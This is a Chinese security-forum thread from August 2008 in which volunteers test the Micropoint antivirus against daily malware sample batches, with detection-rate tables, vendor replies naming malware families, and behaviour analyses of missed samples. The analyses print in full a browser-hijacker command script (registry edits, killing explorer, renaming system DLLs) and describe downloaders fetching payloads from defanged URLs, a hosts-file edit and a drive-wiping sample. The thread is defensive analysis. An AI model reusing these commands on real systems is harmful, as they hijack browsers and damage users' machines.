微点主动防御软件[8月测试][更新至][Kafan Virlist 2008.08.30]---96.84%
[size=5][b][color=red]测试人员:啊弥陀佛(测试0.5天,复查1天,详细分析样本危害8天)[/color]
[/b][/size][size=5][b][color=red]chengguizi(测试1天,复查2天)
风吹我走(测试7天,复查3天)[/color]
[/b][/size][size=5][b][color=red]Killerwhale(测试11.7天,复查3天)[/color][/b][/size]
[size=5][b][color=red]pikachu30(详细分析样本危害2天)[/color][/b][/size][size=5][b][color=red][color=red]
[/color]shmily512099(测试7天,复查12天)
[/color][color=#0000ff][color=red]微点卫士(测试1天)[/color][/color]
[/b][/size][color=#0000ff][size=5][color=red][b]taiw_1144(复查2天)[/b][/color][/size][size=3]
[/size][/color]
[size=3][color=#0000ff][/color][/size]
[size=3][color=#0000ff][/color][/size]
[size=3][color=#0000ff]测试说明:[/color][/size]
[size=3][color=#0000ff]测试版本:微点正式版 (谢谢官方奖励 [:03:] )
测试机器:宏碁5930G笔记本 (爽)
测试鼠标:罗技MX510 (少心疼一点)
测试用虚拟机:VMware_Workstation_6.0
测试环境:Windows Xp Sp2 原版 (2004年2月发布 用老版本测试的原因见特别说明)
[/color][/size][size=3][color=#0000ff]我承诺每天未查杀样本2 MP 并在3楼贴出官方回复
我承诺每天更新测试日志 对微点表现 测试病毒的危害进行简单总结
测试方法:
本帖测试包含特征码+智能行为分析
进行解压测试 删除已知病毒 进入文件夹 依次运行病毒 进行行为分析 删除未知病毒 统计剩余病毒数 判断防御成功的标准定为删除源文件或者阻止所有恶意行为 运行病毒后重新启动一次电脑 并延迟半小时发布 以便病毒充分运行 每天在2楼贴出测试截图和未杀病毒样本包[/color][/size]
[size=3][/size]
[size=3][b][color=#ff8c00]特别说明:[/color]
[color=#ff8c00]主防测试将不包含样本中dll文件和htm等非win32程序 每天的测试的表格中[color=#000000][color=#ff8c00]侦测比那一栏会有两个[/color][/color]百分比 第一个为当天拦截的*.exe样本数/总的*.exe样本数 第二个为拦截的*.exe样本数/总的样本数 个人觉得第一个百分比更具有参考价值 样本中dll文件和htm等非win32程序的个数会在样本总数那一栏中标出 [/color]
[/b][/size][b][size=3][color=#ff0000][color=#0000ff]关于有些人复查结果跟我测试结果不同的说明:
以下为官方回复:
由于病毒在不同的操作平台上实现的功能不尽相同比如在xp下运行现象为A在2000下运行现象是B,或者在打了部分安全补丁的情况下运行现象是C,在未打补丁的情况下运行现象是D,又或者本身存在的一些BUG,在部分系统就不能运行,没有现象等,另外还有一些在虚拟器下没有现象在实际系统中才会运行,测试平台的不一样是有可能导致现象的不同,属于正常。我们建议您不要测试样本,如果您发现微点没有报警的样本请及时和我们联系,我们将提供有效的测试平台进行专业的测试,并给与您答复。[/color]
[/color][color=#ff8c00][/color][/size]
[/b][size=3][color=#ff8c00][b]注意:
1 由于微点测试的特殊性,劳动量相当大,本人不保证每天测试,但保证尽量抽出时间更新。[/b][/color][/size][size=3][color=#ff8c00][b](如果实在无法测试我会提前与其他人联系 由他完成当天测试 尽可能给大家看到完整的测试)
2 由于抽样测试的样本抽取方式和数量引起的争议太大,本着宁缺勿烂的原则,保证完整运行所有的*.exe病毒,给大家一个尽可能公正的结果,决不用抽样测试以偏概全 以点代面。
3 本测试基本能说明微点立体防御体系,但其效果需要自己去完善和体会。
4 测试成绩仅供参考!如有雷同 纯属巧合![/b][/color][/size]
[b][size=3][color=#ff8c00]5 本测试的测试方法见此贴:[/color][url=http://bbs.kafan.cn/viewthread.php?tid=296626&page=1&extra=page%3D1#pid4305774][color=#ff8c00]http://bbs.kafan.cn/viewthread.php?tid=296626&page=1&extra=page%3D1#pid4305774[/color][/url]
[/size][/b]
[size=3][/size]
[size=5][color=#0000ff][b]测试日志(30号更新):[/b][/color][/size]
[b][size=5][color=#0000ff]一个下载者 [/color][/size][/b]
[b][size=5][color=#0000ff]一个ROOKIT[/color][/size][/b]
[b][size=5][color=#0000ff][/color][/size][/b]
[size=4][b][size=3][color=#ff0000]本版规则
本区发布对卡饭样本区每天提交的病毒样本进行的杀软扫描数据变化趋势
主要用于反映各个杀软自身扫描侦测能力随时间纵向的变化
请从长期角度看待这个动态测试区的测试结果[/color][/size][/b][/size]
[size=4]
[table=90%][tr][td=1,1,46][/td][td=1,1,82]特征码查杀数[/td][td=1,1,70]主动防御查杀数[/td][td=1,1,61]样本总数[/td][td=1,1,114]侦测比 [/td][td=1,1,111]病毒库[/td][/tr][tr][td=1,1,46]1[/td][td=1,1,82]41[/td][td=1,1,70]169[/td][td=1,1,61]243[/td][td=1,1,114][color=#ff0000]86.42% [/color][/td][td=1,1,111]1.6.801.080801[/td][/tr][tr][td=1,1,46]2[/td][td=1,1,82]12[/td][td=1,1,70]84[/td][td]117[/td][td][color=#ff0000]82.05%[/color] [/td][td=1,1,111]1.6.802.080802[/td][/tr][tr][td=1,1,46]3[/td][td=1,1,82]31[/td][td=1,1,70]86[/td][td]119[/td][td][color=#00ff00][b]98.32%[/b][/color] [/td][td=1,1,111]1.6.803.080803[/td][/tr][tr][td=1,1,46]4[/td][td=1,1,82]5(汗……)[/td][td=1,1,70]66[/td][td]73[/td][td]97.26% [/td][td=1,1,111]1.6.804.080804[/td][/tr][tr][td=1,1,46]5[/td][td=1,1,82]26[/td][td=1,1,70]149[/td][td]182[/td][td]96.15% [/td][td=1,1,111]1.6.805.080805[/td][/tr][tr][td=1,1,46]6[/td][td=1,1,82]38[/td][td=1,1,70]136[/td][td][color=#000000]186[/color][/td][td]93.54% [/td][td=1,1,111]1.6.806.080806[/td][/tr][tr][td=1,1,46]7[/td][td=1,1,82]33[/td][td=1,1,70]163[/td][td]196[/td][td][color=#00ff00][b]100%[/b][/color][/td][td=1,1,111]1.6.806.080807[/td][/tr][tr][td=1,1,46]8[/td][td=1,1,82]37[/td][td=1,1,70]146[/td][td]193[/td][td]94.82%[/td][td=1,1,111]1.6.808.080808[/td][/tr][tr][td=1,1,46]9[/td][td=1,1,82]13[/td][td=1,1,70]104[/td][td]130[/td][td]90%[/td][td=1,1,111]1.6.809.080809[/td][/tr][tr][td=1,1,46]10[/td][td=1,1,82]12[/td][td=1,1,70]67[/td][td]84[/td][td]94.05%[/td][td=1,1,111]1.6.810.080810[/td][/tr][tr][td=1,1,46]11[/td][td=1,1,82]9[/td][td=1,1,70]69+1[/td][td]82[/td][td]96.34%[/td][td=1,1,111]1.6.810.080811[/td][/tr][tr][td=1,1,46]12[/td][td=1,1,82]14[/td][td=1,1,70]83[/td][td]97[/td][td][color=#00ff00][b]100%[/b][/color](2人复查)[/td][td=1,1,111]1.6.812.080812[/td][/tr][tr][td=1,1,46]13[/td][td=1,1,82]38[/td][td=1,1,70]81[/td][td]124[/td][td]95.97%[/td][td=1,1,111]1.6.813.080813[/td][/tr][tr][td=1,1,46]14[/td][td=1,1,82]24[/td][td=1,1,70]89[/td][td]119[/td][td]94.96%(复查杀掉3个)[/td][td=1,1,111]1.6.814.080814[/td][/tr][tr][td=1,1,46]15[/td][td=1,1,82]55[/td][td=1,1,70]103+1[/td][td]162[/td][td][color=#00ff00]98.15%[/color][/td][td=1,1,111]1.6.815.080815[/td][/tr][tr][td=1,1,46]16[/td][td=1,1,82]22[/td][td=1,1,70]62[/td][td]90[/td][td]93.33%[/td][td=1,1,111]1.6.816.080816[/td][/tr][tr][td=1,1,46]17[/td][td=1,1,82]12[/td][td=1,1,70]91[/td][td]109[/td][td]94.49%[/td][td=1,1,111]1.6.817.080817[/td][/tr][tr][td=1,1,46]18[/td][td=1,1,82]6[/td][td=1,1,70]58[/td][td]65[/td][td][b][color=#00ff00]98.46%[/color][/b][/td][td=1,1,111]1.6.818.080818[/td][/tr][tr][td=1,1,46]19[/td][td=1,1,82]14[/td][td=1,1,70]65[/td][td]81[/td][td]97.53%[/td][td=1,1,111]1.6.819.080819[/td][/tr][tr][td=1,1,46]20[/td][td=1,1,82]14[/td][td=1,1,70]90[/td][td]106[/td][td][b][color=#00ff00]98.11%[/color][/b][/td][td=1,1,111]1.6.820.080820[/td][/tr][tr][td=1,1,46]21[/td][td=1,1,82]11[/td][td=1,1,70]88+1[/td][td]118[/td][td][color=#ff0000]84.75%(3人复查)[/color][/td][td=1,1,111]1.6.821.080821[/td][/tr][tr][td=1,1,46]22[/td][td=1,1,82]13[/td][td=1,1,70]142[/td][td]158[/td][td][color=#00ff00][b]98.10%[/b][/color][/td][td=1,1,111]1.6.822.080822[/td][/tr][tr][td=1,1,46]23[/td][td=1,1,82]32[/td][td=1,1,70]114[/td][td]149[/td][td]97.99%(未复查)[/td][td=1,1,111]1.6.824.080823[/td][/tr][tr][td=1,1,46]24[/td][td=1,1,82]108[/td][td=1,1,70]141[/td][td]254[/td][td][color=lime][b]98.03%[/b][/color][/td][td=1,1,111]1.6.825.080824[/td][/tr][tr][td=1,1,46]25[/td][td=1,1,82]35[/td][td=1,1,70]92[/td][td]132[/td][td]96.21%[/td][td=1,1,111]1.6.826.080825[/td][/tr][tr][td=1,1,46]26[/td][td=1,1,82]8(……)[/td][td=1,1,70]101[/td][td]112[/td][td]97.32%[/td][td=1,1,111]1.6.827.080826[/td][/tr][tr][td=1,1,46]27[/td][td=1,1,82][color=darkorange]放假一天[/color][/td][td=1,1,70][color=#ff8c00]放假一天[/color][/td][td][color=#ff8c00]放假一天[/color][/td][td][color=#ff8c00]放假一天[/color][/td][td=1,1,111][color=#ff8c00]放假一天[/color][/td][/tr][tr][td=1,1,46]28[/td][td=1,1,82]56[/td][td=1,1,70]166[/td][td]227[/td][td]97.80%[/td][td=1,1,111]1.6.829.080828[/td][/tr][tr][td=1,1,46]29[/td][td=1,1,82]27[/td][td=1,1,70]80+1(A1-101复查已杀 感谢[b][size=3][color=black]shmily512099[/color][/size][/b])[/td][td]109[/td][td][b][color=lime]99.08%[/color][/b][/td][td=1,1,111]1.6.830.080829[/td][/tr][tr][td=1,1,46]30[/td][td=1,1,82]4[:08:] [/td][td=1,1,70]88[/td][td]95[/td][td]96.84%[/td][td=1,1,111]1.6.832.080830[/td][/tr][tr][td=1,1,82]31[/td][td=1,1,70][/td][td][/td][td][/td][td=1,1,111][/td][/tr][/table][/size]
[[i] 本帖最后由 killerwhale 于 2008-8-30 19:35 编辑 [/i]]
测试截图和未杀样本
[color=blue][color=blue]2008年8月30日[/color][/color][color=blue][color=blue][attach]347542[/attach]
[attach]347541[/attach][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月29日[/color][/color]
[color=blue][color=blue][attach]346789[/attach][/color][/color]
[attach]346790[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月28日
[attach]346193[/attach][/color][/color]
[attach]346194[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月26日[/color][/color]
[color=blue][color=blue][attach]344686[/attach][/color][/color]
[attach]344687[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月25日[/color][/color]
[attach]343909[/attach]
[attach]343910[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月24日[/color][/color]
[color=blue][color=blue][attach]343072[/attach][/color][/color]
[attach]343073[/attach]
[color=#0000ff][/color]
[color=#0000ff][/color]
[color=blue][color=blue]2008年8月23日[/color][/color]
[color=#0000ff][attach]342377[/attach][/color]
[color=#0000ff][attach]342378[/attach][/color]
[color=blue][color=blue]2008年8月22日[/color][/color]
[color=blue][color=blue][attach]341500[/attach][/color][/color]
[attach]341501[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月21日[/color][/color]
[color=blue][color=blue][attach]340732[/attach][/color][/color]
[attach]340733[/attach][attach]340734[/attach][attach]340735[/attach][attach]340736[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月20日
[attach]339880[/attach][/color][/color]
[attach]339881[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月19日[/color][/color]
[color=blue][color=blue][attach]339101[/attach][/color][/color]
[attach]339102[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月18日[/color][/color]
[color=#0000ff][attach]338113[/attach][/color]
[attach]338114[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月17日[/color][/color]
[attach]337474[/attach]
[attach]337475[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月16日[/color][/color]
[color=blue][color=blue][attach]337253[/attach][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月15日
[attach]336071[/attach][/color][/color]
[color=blue][color=blue][attach]336072[/attach][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月14日[/color][/color]
[color=blue][color=blue][/color][/color]
[attach]334674[/attach]
[attach]334675[/attach]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月13日[/color][/color]
[color=blue][color=blue][attach]334007[/attach][/color][/color]
[color=blue][color=blue][attach]334008[/attach][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月12日[/color][/color]
[color=#0000ff][attach]333274[/attach][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月11日
[attach]332332[/attach][/color][/color]
[attach]332333[/attach]
[color=blue][color=blue]2008年8月10日[/color][/color]
[attach]331753[/attach]
[attach]331752[/attach]
[color=blue][color=blue]2008年8月9日[/color][/color]
[color=blue][color=blue][attach]330926[/attach][/color][/color]
[color=#0000ff][attach]330927[/attach][attach]330928[/attach][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月8日
[attach]330245[/attach][/color][/color]
由于我的失误造成资料丢失 本日剩余样本不上传 给大家道歉[:13:]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月7日[/color][/color]
[color=blue][color=blue][attach]328773[/attach][/color][/color]
[color=blue][color=blue][/color][/color]
[color=blue][color=blue]2008年8月6日[/color][/color]
[color=blue][color=blue][attach]328181[/attach][/color][/color]
[color=#0000ff][/color]
[color=#0000ff][/color]
[attach]328433[/attach][attach]328434[/attach]
[color=#0000ff][/color]
[color=#0000ff][/color]
[color=blue][color=blue]2008年8月5日[/color][/color]
[color=blue][attach]327062[/attach][/color]
[attach]327061[/attach]
[color=blue][/color]
[color=blue]
[color=blue]2008年8月4日[/color]
[attach]326226[/attach]
[attach]326227[/attach]
[/color][color=blue][/color]
[color=blue]2008年8月3日[/color]
[attach]324871[/attach]
[color=blue][attach]324872[/attach][/color]
[color=#0000ff][/color]
[color=blue][/color]
[color=blue]2008年8月2日[/color]
[attach]324243[/attach]
[attach]324244[/attach][attach]324245[/attach][attach]324246[/attach][attach]324247[/attach]
[color=#0000ff][/color]
[color=blue][/color]
[color=blue]2008年8月1日[/color]
[attach]323247[/attach]
[attach]323248[/attach][attach]323249[/attach][attach]323250[/attach][attach]323251[/attach]
[[i] 本帖最后由 killerwhale 于 2008-8-30 19:36 编辑 [/i]]
官方上报回复
[color=Blue][size=7]17号病毒回馈[/size][/color]尊敬的用户,您好!
您的邮件已经收到,感谢您及时联系微点客户服务人员!希望下面的邮件内容能够使您得到您所需要的帮助:根据您描述的情况及提供的信息,我们的技术工程师做了详细的测试与分析。详情如下:
080817-1-1.exe:压缩包自解压文件,包含AdWare.Win32.StartPage;
080817-1-3.exe:Trojan-PSW.Win32.LdPinch
080817-1-6.exe:Trojan-Downloader.Win32.Mutant
080817-1-7.exe:非病毒文件
080817-2-1.exe:安装包文件,包含Rootkit.Win32.InsApc;
080817-A1-13.exe:Trojan-Spy.Win32.Downloader;
080817-A1-18.exe:Trojan.Win32.Slefdel;
080817-A1-31.exe:Trojan-PSW.Win32.OnLineGames;
080817-A1-43.exe:Trojan-Spy.Win32.Downloader;
080817-A1-44.exe:Trojan-Spy.Win32.Downloader;
080817-A1-49.exe:Trojan-PSW.Win32.OnLineGames
080817-A1-75.exe:Trojan-PSW.Win32.OnLineGames
--------------------------------------------------------------------------------
东方微点技术支持
| 北京东方微点信息技术有限责任公司
| BeiJing Eastern Micropoint Info-Tech CO., LTD
| 技术支持: [email]support@micropoint.com.cn[/email]
| 样本上报: [email]virus@micropoint.com.cn[/email]
| 官方论坛: [url]http://bbs.micropoint.com.cn[/url]
[[i] 本帖最后由 killerwhale 于 2008-8-19 23:03 编辑 [/i]] [Kafan Virlist 2008.07.24]
改一改吧~ 谢谢楼上提醒了 不愧是沙发三人组出来的 手就是快
15号未杀样本中的A1-145复查后报警 见下图
[attach]336084[/attach]
[[i] 本帖最后由 killerwhale 于 2008-8-15 22:02 编辑 [/i]] 期待微点8月的表现,有时间也帮点忙 呵呵
这个肯定支持的啊 [size=5][color=red]080814-4-7.exe[/color][/size]:rar自解压文件,运行后释放hh.reg导入注册表,映像劫持notepad.exe到cmd命令调用,删除D盘所有文件及其子目录,其他动作无,微点暂不处理。
[size=5][color=red]080814-5-5.exe[/color][/size]:修改主页为htp://www.31fa.com,开启保护状态下微点可以拦截IE主页保护,其他动作无。如下:“修改注册表项:
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
是否阻止?”
[size=5][color=red]080814-5-9.exe[/color][/size]:运行后检测C:\DOCUME~1\guo\APPLIC~1\geawfrvckvt.dll,C:\DOCUME~1\guo\APPLIC~1\kyf.dat,C:\DOCUME~1\guo\APPLIC~1\msbb.exe,C:\DOCUME~1\guo\APPLIC~1\ncmyb.dll"等文件是否存在,这些文件不存在于本地硬盘,其他动作无
[size=5][color=red]080814-A2-26.exe[/color][/size]:如果网络连通或链接有效的情况下,下载htp://xnibi.com/pmm.exe到本地默认用户目录下保存为t.pif,t.pif非病毒文件。
[size=5][color=red]080814-A2-94.exe[/color][/size]:安装包文件,包含scm13.exe与23.sys,scm13.exe负责安装驱动23.sys,23.sys加载后在%windir%\system32\目录下创建文件sysbar.exe,无后续动作。
[size=5][color=blue]080815-A1-31.exe[/color][/size]:该程序执行后创建dtkfytrefrr的事件,创建一线程检测%windir%、system32目录下是否存在win**.tmp文件,存在则删除,并删除自身启动项,指向win**.exe文件,执行命令行copy命令试图将自身拷贝到system32目录下命名为win**.exe,拷贝失败;检测事件iSSD_CM是否存在,如不存在陷入1989ms死循环。
[size=5][color=blue]080815-A1-31.exe[/color][/size]:病毒代码存在bug。
[size=5][color=blue]080815-A1-145.exe[/color][/size]:微点可以报警并提示延时删除。
[size=5][color=blue]080815-A2-3[/color][/size]:安装包文件,包含scm01.exe与1.sys,scm01.exe负责安装驱动1.sys,1.sys加载后在%windir%\system32\目录下创建文件sysbar.exe,无后续动作。
[size=5][color=blue]080815-A2-1.exe[/color][/size]:微点可以成功拦截并删除
[size=5][color=red]080817-1-1.exe[/color][/size]:rar自解压文件,运行后释放hao123.exe、go.exe、go.bat、hao123.zip、指向hxxp://www.111555.com.cnIE快捷方式等,批处理执行hao123.exe,hao123.exe调用如下命令行:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "[url=http://www.111555.com.cn/?in=StarPage]www.111555.com.cn/?in=StarPage[/url]" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Page" /t REG_SZ /d "[url=http://www.111555.com.cn/?in=IESearch]www.111555.com.cn/?in=IESearch[/url]" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Search Bar" /t REG_SZ /d "[url=http://www.111555.com.cn/?in=IERSearch]www.111555.com.cn/?in=IERSearch[/url]" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "Source" /t REG_SZ /d "[url=http://www.111555.com.cn/dtop/]http://www.111555.com.cn/dtop/[/url]" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "SubscribedURL" /t REG_SZ /d "[url=http://www.111555.com.cn/?in=15]www.111555.com.cn/?in=15[/url]" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "FriendlyName" /t REG_SZ /d "name" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "Flags" /t REG_DWORD /d "0x2002" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "Position" /t REG_BINARY /d "2C00000064FFFFFF030000009D0000000F000000EC03000001000000010000000100000000000000000000" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "CurrentState" /t REG_DWORD /d "0x40000001" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "OriginalStateInfo" /t REG_BINARY /d "1800000064FFFFFF030000009D0000000F00000001000040" /f
push reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0" /v "RestoredStateInfo" /t REG_BINARY /d "01406C740000000001000C3B30BC1000342D937CA46C0700" /f
push reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d "00000001" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d "00000001" /f
xcopy "1\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\桌面\" /k /c /q /r /y
assoc .txt=txtfile
xcopy "2\lnternet Explorer.lnk" "%ALLUSERSPROFILE%\「开始」菜单\程序\" /k /c /q /r /y
xcopy "3\lnternet Explorer.lnk" "%APPDATA%\Microsoft\Internet Explorer\Quick Launch" /k /c /q /r /y
assoc .txt=txtfile
reg delete HKEY_CLASSES_ROOT\piffile /v IsShortcut /f
reg delete HKEY_CLASSES_ROOT\lnkfile /v IsShortcut /f
del "%ALLUSERSPROFILE%\..\*Internet*.lnk" /s
del "%ALLUSERSPROFILE%\..\*Internet*.url" /s
taskkill /f /im explorer.exe
taskkill /f /im IEXPLORE.EXE
rename %windir%\system32\shdoclc.dll shlo.rar
rename %windir%\system32\hao123.zip shdoclc.dll
logoff
exit
[size=5][color=red]080817-2-1.exe[/color][/size]:安装包文件,包含scm14.exe与14.sys,scm14.exe负责安装驱动12.sys,14.sys加载后在%windir%\system32\目录下创建文件syswindrv.dll,无后续动作。
[size=5][color=red]080817-A1-13.exe[/color][/size]:创建一线程,执行后尝试打开事件iSSD_CM,检测系统是否具有ProgramFilesDir的启动项,拷贝不存在的文件0C:\Program Files\PCHealthCenter\sex1.ico到C:\windows\system32\sex1.ico,检测注册表获取桌面路径,释放PEEP SHOW.lnk,指向网址hxxp://www.onlybestsex.com/,休眠240000ms等待事件iSSD_CM
[size=5][color=red]080817-A1-43.exe[/color][/size]:休眠60000ms后打开事件iSSD_CM,弹出对话框,启动IE进程打开网址hxxp://scanner.anvi-scanner.com/34/?advid=0000004683&OIHWUE&GHEEEEW&",
[size=5][color=red]080817-A1-44.exe[/color][/size]:创建一线程删除C:\Windows\SUE46.tmp及其自身启动项,新建启动项指向SUE46.exe,执行命令行下copy命令将自身拷贝到C:\X1,在执行copy "C:\X1" "C:\C:\Windows\SUE3C.exe,病毒命令存在错误,动作失败。
[size=5][color=red]080817-A1-49.exe[/color][/size]:对host文件作如下修改:
218.93.248.137 [url=http://www.dllsky.com]www.dllsky.com[/url]
218.93.248.137 [url=http://www.dllsky.com]www.dllsky.com[/url]
[align=left][font=宋体][size=10pt][size=5][color=blue]080818-3-5.exe[/color][/size]:[size=4]微点可以拦截[/size][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align]
[align=left][font=宋体][size=10pt][font=宋体][size=10pt][/size][/font][/size][/font][/align]
[align=left][font=宋体][size=10pt][/size][/font][/align]
[align=left][font=宋体][size=10pt][/size][/font][/align]
[align=left][font=宋体][size=10pt][/size][/font][/align]
[align=left][font=宋体][size=10pt][/size][/font][/align]
[align=left][font=宋体][size=10pt][/size][/font][/align]
[align=left][font=宋体][size=10pt][/size][/font][/align]
[align=left][font=宋体][size=10pt][size=5][color=red]080819-A1-47.exe[/color][/size]:[size=4]非病毒文件[/size][/size][/font][/align]
[align=left][font=宋体][size=10pt][size=4][/size][/size][/font][/align]
[align=left][font=宋体][size=10pt][size=5][color=red]080819-1-7.exe[/color][/size]:[size=4]非病毒文件[/size][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][align=left][font=宋体][size=4][/size][/font][/align][font=Times New Roman][size=5][color=blue]080820-A1-70.exe[/color][/size][/font][font=宋体]:[size=4]非病毒文件[/size][/font]
[font=宋体][size=4][/size][/font]
[font=宋体][font=Times New Roman][size=5][color=blue]080820-A1-94.exe[/color][/size][/font][font=宋体]:[size=4]流氓软件包[/size][/font][/font]
[font=宋体][size=4][/size][/font]
[font=宋体][size=4][/size][/font]
[font=宋体][size=4][/size][/font]
[font=宋体][font=Times New Roman][size=5][color=#ff0000]080821-2-1.exe[/color][/size][/font][font=宋体]:[size=4]非病毒文件[/size][/font]
[font=Times New Roman][size=5][color=red]080821-2-2.exe[/color][/size][/font][font=宋体]:[size=4]非病毒文件[/size][/font]
[font=Times New Roman][size=5][color=red]080821-4-0.exe[/color][/size][/font][font=宋体]:[size=4]运行后创建一[/size][/font][size=4][font=Times New Roman]IE[/font][font=宋体]进程,并在[/font][font=Times New Roman]IE[/font][font=宋体]目录下释放[/font][font=Times New Roman]setupapi.dll[/font][font=宋体],休眠[/font][font=Times New Roman]2500. ms[/font][font=宋体];打开释放的[/font][font=Times New Roman]dll[/font][font=宋体]文件,继续写入一遍,休眠[/font][font=Times New Roman]2500. ms[/font][font=宋体];创建[/font][font=Times New Roman]C:\Program Files\Opera\setupapi.dll[/font][font=宋体],[/font][font=Times New Roman] C:\Program Files\Mozilla Firefox\setupapi.dll[/font][font=宋体],使用[/font][font=Times New Roman]Windows[/font][font=宋体]注册的动态库实现程序启动自动装载。[/font][/size][font=Times New Roman] [/font]
[font=Times New Roman][size=5][color=red]080821-4-2.exe[/color][/size][/font][font=宋体]:[size=4]循环检测[/size][/font][size=4][font=Times New Roman] msapp.exe[/font][font=宋体]是否存在,不存在则陷入死循环。[/font][/size]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080821-A1-2.exe[/color][/size][/font][font=宋体]:非病毒文件[/font]
[font=Times New Roman][/font]
[font=Times New Roman][size=5][color=red]080821-A1-4.exe[/color][/size][/font][font=宋体]:[/font][size=4][font=Times New Roman]rootkit[/font][font=宋体]行为,驱动[/font][font=Times New Roman]msliksurserv.sys[/font][/size]
[font=Times New Roman][size=5][color=red]080821-A1-5.exe[/color][/size][/font][font=宋体]:[size=4]行为同上[/size][/font]
[font=Times New Roman][size=5][color=red]080821-A1-6.exe[/color][/size][/font][font=宋体]:[size=4]行为同上[/size][/font]
[font=Times New Roman][size=5][color=red]080821-A1-7.exe[/color][/size][/font][font=宋体]:[size=4]行为同上[/size][/font]
[font=Times New Roman][size=5][color=red]080821-A2-8.exe[/color][/size][/font][font=宋体]:[size=4]微点报警[/size][/font]
[font=Times New Roman][size=5][color=red]080821-A2-13.exe[/color][/size][/font][font=宋体]:[size=4]释放[/size][/font][size=4][font=Times New Roman]fsusbtd.dll[/font][font=宋体]到[/font][font=Times New Roman]system32[/font][font=宋体]目录下,开启一线程在[/font][font=Times New Roman]\Appinit[/font][font=宋体]添加启动项[/font][font=Times New Roman]zsqf.dll,ytfa.dll,ytfb.dll,fsusbtd.dll[/font][/size][font=宋体][size=4]未成功,释放批处理自删除[/size]。[/font]
[font=Times New Roman][size=5][color=red]080821-A2-14.exe[/color][/size][/font][font=宋体]:[size=4]循环[/size][/font][size=4][font=Times New Roman]999. ms[/font][font=宋体]等待事件[/font][font=Times New Roman] iSSD_CM"[/font][font=宋体],不存在则陷入死循环[/font][/size]
[font=Times New Roman][size=5][color=red]080821-A2-18.exe[/color][/size][/font][font=宋体]:[size=4]删除[/size][/font][size=4][font=Times New Roman]%systemroot%[/font][font=宋体]下[/font][font=Times New Roman]SUE49.tmp[/font][font=宋体],并删除[/font][font=Times New Roman]run[/font][font=宋体]自身下注册表启动键值,设置为[/font][font=Times New Roman]SUE49.exe[/font][font=宋体],调用命令行拷贝自身到[/font][font=Times New Roman]C:\X1[/font][font=宋体],拷贝失败,后续动作无意义。[/font][/size]
[font=Times New Roman][size=5][color=red]080821-A2-23.exe[/color][/size][/font][font=宋体]:[size=4]释放[/size][/font][size=4][font=Times New Roman]update.dll[/font][font=宋体]文件,调用[/font][font=Times New Roman]rundll32 [/font][font=宋体]加参数[/font][font=Times New Roman]Main[/font][font=宋体]执行,单一程序无可疑动作。[/font][/size]
[size=4][font=Times New Roman][size=5][color=red]080821-A2-57.exe[/color][/size][/font][font=宋体]:[/font][font=宋体]在网络连通与文件下载链接有效的情况下运行后连接[/font][font=宋体]ttp://image.yahoo550.com/image/logo.jpg?queryid=80021[/font][font=宋体]下载[/font][font=宋体]7G[/font][font=宋体]4eY5F[/font][font=宋体]到本地执行[/font][/size]
